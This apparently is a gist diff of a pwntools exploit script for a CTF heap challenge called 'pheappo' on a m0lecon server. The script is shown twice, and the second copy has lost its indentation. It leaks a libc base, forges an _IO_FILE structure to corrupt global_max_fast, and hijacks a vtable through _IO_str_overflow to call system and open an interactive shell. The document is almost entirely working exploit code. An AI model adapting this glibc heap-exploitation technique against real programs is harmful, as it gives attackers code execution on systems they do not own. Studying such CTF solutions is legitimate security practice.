hkraw · November 14, 2020 21:03
diff --git a/pheappo_expl.py b/pheappo_expl.py
 #!/usr/bin/python3
 from pwn import *
 from IO_FILE import *
 from past.builtins import xrange
 from time import sleep
 import random

 #Util
 def add(size):
 	io.sendlineafter('Choice: ','1')
 	io.sendlineafter('Size: ',str(size))

 def read(idx):
 	io.sendlineafter('Choice: ','2')
 	io.sendlineafter('Index: ',str(idx))
 	return io.recvuntil('=== Menu ===>')

 def edit(idx,data):
 	io.sendlineafter('Choice: ','3')
 	io.sendlineafter('Index: ',str(idx))
 	io.sendafter('Data: ',data)

 def delete(idx):
 	io.sendlineafter('Choice: ','4')
 	io.sendlineafter('Index: ',str(idx))

 #libc 2.27
 libc = ELF('./libc.so.6')
 unsorted_bin_addr = 0x3ebca0
 global_max_fast = 0x3ed940
 system = 0x4f440
 str_binsh = 0x1b3e9a
 _IO_list_all = 0x3ec660
 _IO_file_jumps = 0x3e82a0
 _IO_str_jumps = _IO_file_jumps+0xc0
 _IO_str_overflow = _IO_str_jumps+0x18

 #Exploit
 if __name__ == '__main__':
 #	io = process('./pheappo',env={'LD_PRELOAD':libc.path})
 	io = remote('challs.ctf.m0lecon.it',9001)

 	add(0x1800) #0
 	add(0x418) #1
 	delete(0)
 	libc_leak = u64(read(0)[0:8])
 	libc_base = libc_leak - unsorted_bin_addr
 	print(hex(libc_base))

 	IO_file = IO_FILE_plus(arch=64)
 	stream = IO_file.construct(
 		flags=0,buf_base=0,
 		read_end=0,read_base=libc_base+global_max_fast-0x10,
 		buf_end=(libc_base+str_binsh-100)//2,write_ptr=(libc_base+str_binsh-100)//2,
 		write_base=0,
 		lock=libc_base+_IO_list_all+0x8,
 		vtable=libc_base+_IO_str_overflow-0x38 )
 	stream += p64(libc_base+system) + b'\n'
 	
 	edit(0,stream[0x10:])
 	add(0x1800) #2
 	delete(2)
 	io.interactive()
	#!/usr/bin/python3
	from pwn import *
	from IO_FILE import *
	from past.builtins import xrange
	from time import sleep
	import random

	#Util
	def add(size):
	io.sendlineafter('Choice: ','1')
	io.sendlineafter('Size: ',str(size))

	def read(idx):
	io.sendlineafter('Choice: ','2')
	io.sendlineafter('Index: ',str(idx))
	return io.recvuntil('=== Menu ===>')

	def edit(idx,data):
	io.sendlineafter('Choice: ','3')
	io.sendlineafter('Index: ',str(idx))
	io.sendafter('Data: ',data)

	def delete(idx):
	io.sendlineafter('Choice: ','4')
	io.sendlineafter('Index: ',str(idx))

	#libc 2.27
	libc = ELF('./libc.so.6')
	unsorted_bin_addr = 0x3ebca0
	global_max_fast = 0x3ed940
	system = 0x4f440
	str_binsh = 0x1b3e9a
	_IO_list_all = 0x3ec660
	_IO_file_jumps = 0x3e82a0
	_IO_str_jumps = _IO_file_jumps+0xc0
	_IO_str_overflow = _IO_str_jumps+0x18

	#Exploit
	if __name__ == '__main__':
	# io = process('./pheappo',env={'LD_PRELOAD':libc.path})
	io = remote('challs.ctf.m0lecon.it',9001)

	add(0x1800) #0
	add(0x418) #1
	delete(0)
	libc_leak = u64(read(0)[0:8])
	libc_base = libc_leak - unsorted_bin_addr
	print(hex(libc_base))

	IO_file = IO_FILE_plus(arch=64)
	stream = IO_file.construct(
	flags=0,buf_base=0,
	read_end=0,read_base=libc_base+global_max_fast-0x10,
	buf_end=(libc_base+str_binsh-100)//2,write_ptr=(libc_base+str_binsh-100)//2,
	write_base=0,
	lock=libc_base+_IO_list_all+0x8,
	vtable=libc_base+_IO_str_overflow-0x38 )
	stream += p64(libc_base+system) + b'\n'

	edit(0,stream[0x10:])
	add(0x1800) #2
	delete(2)
	io.interactive()
No results found